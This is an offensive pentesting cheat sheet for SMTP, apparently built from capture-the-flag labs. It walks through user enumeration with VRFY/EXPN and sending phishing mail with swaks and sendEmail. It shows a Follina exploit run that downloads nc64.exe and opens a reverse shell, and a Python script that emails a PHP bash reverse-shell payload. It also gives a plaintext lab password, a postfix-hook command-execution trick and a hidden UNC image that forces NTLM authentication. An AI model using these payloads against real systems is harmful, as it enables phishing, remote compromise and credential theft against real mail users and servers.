25, 465, 587 - SMTP(S)
Banner Grabbing
// SMTP
nc -vn <IP> 25
// SMTPS
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587Find Organization MX Server
dig +short mx google.comRemote - Connect to SMTP server with netcat
kyle@writer:/etc/postfix$ nc localhost 25
220 writer.htb ESMTP Postfix (Ubuntu)
HELO writer.htb
250 writer.htb
MAIL FROM:<kyle@writer.htb>
250 2.1.0 Ok
RCPT TO:<kyle@writer.htb>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
Subject: This is a email.
.
250 2.0.0 Ok: queued as 9FF0C802Remote - NTML Auth
$ telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAARemote - Enum Users
$ telnet 10.0.10.1 25
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
// RCPT TO
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
// VRFY
VRFY root
250 Super-User <root@myhost>
VRFY blah
550 blah... User unknown
// EXPN
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <ed.williams@myhost>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>Local - Setup Postfix SMTP server
// Install & Configure
$ apt install mailutils postfix
$ sudo postconf -e "mydestination = $myhostname, void, localhost.localdomain, localhost"
$ sudo postconf -e "mynetworks = 127.0.0.0/8, 10.10.14.0/24"
$ sudo postconf -e "inet_interfaces = all"
$ sudo postconf -e "inet_protocols = ipv4"
$ sudo postconf -e "recipient_delimiter = +"
$ sudo postconf -e "lmtp_host_lookup = native"
$ sudo postconf -e "smtp_host_lookup = native"
$ service postfix restart
// Send mail
$ telnet localhost 25
220 void.xxxxx.se ESMTP Postfix (Debian/GNU)
ehlo localhost
250-void.xxxxx.se
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
mail from: void@void
250 2.1.0 Ok
rcpt to: itsupport@outdated.htb
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Subject: Phishing
http://10.10.14.6:8080
.
250 2.0.0 Ok: queued as 0C51812101C
quit
221 2.0.0 Bye
// Verify that status=sent
$ cat /var/log/mail.log
[... snip ...]
Aug 15 10:51:28 void postfix/smtp[7917]: 0C51812101C: to=<itsupport@outdated.htb>, relay=outdated.htb[10.10.11.175]:25, delay=54, delays=43/0.01/0.08/11, dsn=2.0.0, status=sent (250 Queued (10.432 seconds))Local - Swaks
$ swaks --to itsupport@outdated.htb --from 0xpthree@exploit.se --server mail.outdated.htb --body "http://10.10.14.6/pwn.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<- 220 mail.outdated.htb ESMTP
-> EHLO void
<- 250-mail.outdated.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<0xpthree@exploit.se>
<- 250 OK
-> RCPT TO:<itsupport@outdated.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Mon, 15 Aug 2022 15:14:51 +0200
-> To: itsupport@outdated.htb
-> From: 0xpthree@exploit.se
-> Subject: test Mon, 15 Aug 2022 15:14:51 +0200
-> Message-Id: <20220815151451.031141@void>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> http://10.10.14.6/pwn.html
->
->
-> .
<- 250 Queued (10.406 seconds)
-> QUIT
<- 221 goodbyeLocal - sendEmail (MSDT Follina example)
// Script used: https://github.com/JohnHammond/msdt-follina
//
// follina.py row 111:
// command = f"""Invoke-WebRequest http://10.10.14.2:4444/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
$ ls -al /tmp/67gup9zc/www
total 64
drwxr-xr-x 2 void void 4096 Aug 19 13:04 .
drwxr-xr-x 4 void void 4096 Aug 19 12:54 ..
-rw-r--r-- 1 void void 4689 Aug 19 12:54 index.html
-rwxr-xr-x 1 void void 45272 Aug 19 13:04 nc64.exe
$ sendEmail -t itsupport@outdated.htb -f 0xpthree@exploit.se -s mail.outdated.htb -u PleaseWork -m 'http://10.10.14.2/'
Aug 19 12:54:31 void sendEmail[17349]: Email was sent successfully!
$ python3 follina.py -i tun0 -p 80 -r 4444
[+] copied staging doc /tmp/67gup9zc
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 4444'
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.175] 49822
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
C:\Users\btables\AppData\Local\Temp\SDIAG_9fb3a047-99c4-4779-8d48-a154f6f5936e> whoami
outdated\btablesLocal - Thunderbird GUI
An alternative if you need to check another users inbox and/or sent emails. Need creds!
Download and install the email client thunderbird. Upon first start enter the following:
Your name: Paul Byrd
Email Address: paulbyrd@sneakymailer.htb
Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
Press 'Continue'. It will fail to find the server, change to following:
INCOMING
Protocol: IMAP
Server Hostname: sneakymailer.htb
Port: 143
SSL: None
Authentication: Normal Password
OUTGOING
Protocol: SMTP
Server Hostname: sneakymailer.htb
Port: 25
SSL: None
Authentication: Normal Password
Press 'Done', check 'I understand the risks' and then 'Done'. Restart thunderbird and you'll be connected to Paul Byrd's email.Local - Send mail using Pyhon
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
print("[-]Connection Error")
exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))Interesting Files
sendmail.cf
submit.cf
/etc/postfix/master.cf
C:\Nuxeo\conf\Catalina\localhost\nuxeo.xmlPostfix master.cf
Contains scripts to be executed if condition is met.
$ cat /etc/postfix/master.cf
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
# user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
# flags=R user=cyrus argv=/cyrus/bin/deliver -e -m ${extension} ${user}
flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}Analyzing the last line means /etc/postfix/disclaimer will be executed if a new mail is received from user john.
$ ls -al | grep discl
-rwxrwxr-x 1 root filter 1022 Sep 10 13:44 disclaimerEdit disclaimer-file to execute whatever bash commands you'd like and send an email to trigger it.
Force NTLM Authentication
In the real world, it's unlikely you can just jump onto the console of a machine as a privileged user and authenticate to your malicious SMB server. Nor can you do NTLM authentication on demand, but there are lots of techniquest to "force" the user to do it unknowingly.
1x1 Images in Emails:
<img src="\\10.10.17.231\test.ico" height="1" width="1" />A sneaky way would be to modify the email signature, so that even legitimate emails send will trigger NTLM authentication from every recipient who reads them.
Last updated